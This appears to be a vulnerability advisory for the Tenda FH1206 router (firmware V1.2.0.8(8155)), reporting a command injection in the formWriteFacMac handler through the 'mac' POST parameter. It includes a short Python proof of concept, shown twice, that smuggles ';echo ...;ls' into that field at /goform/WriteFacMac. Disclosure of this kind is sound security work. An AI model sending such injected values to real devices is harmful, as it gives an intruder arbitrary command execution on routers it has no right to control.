[ Discoverer: ta0lve ]

Overview

Tenda FH1206 V1.2.0.8(8155)

• Firmware download website:
  • https://www.tendacn.com/hk/download/detail-2344.html
  • https://www.tendacn.com/us/download/detail-2344.html

Affected version

V1.2.0.8(8155)

Vulnerability details

The Tenda FH1206 V1.2.0.8(8155) has a command injection vulnerablility located in the formWriteFacMac function.The Var variable receives the mac parameter from a POST request and passes it to the doSystemCmd function, causing an arbitrary command execution. The user-provided mac can trigger this security vulnerability

PoC

# formWriteFacMac 

import requests

ip = '192.168.0.100:80'

url = f"http://{ip}/goform/WriteFacMac"

data = {'mac':";echo 'hack!!!';ls"}

ret = requests.post(url, data)

Additional Information

###Product_version
Tenda FH1206 
V1.2.0.8(8155)_EN

###Affected_component
the "formWriteFacMac " function of /bin/httpd; /bin/httpd

###Attack_vector
use a simple exp to attack, like this:
#python3
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/WriteFacMac"
data = {'mac':";echo 'hack!!!';ls"}
ret = requests.post(url, data)

###Discription
Tenda FH1206 V1.2.0.8(8155) was discovered to contain a command injection vulnerability via the mac parameter at ip/goform/WriteFacMac.

###Refernce
<https://palm-vertebra-fe9.notion.site/formWriteFacMac_RCE-d70cf636739e4a769b1f919ffed4a2a0>
<https://www.tendacn.com/hk/download/detail-2344.html>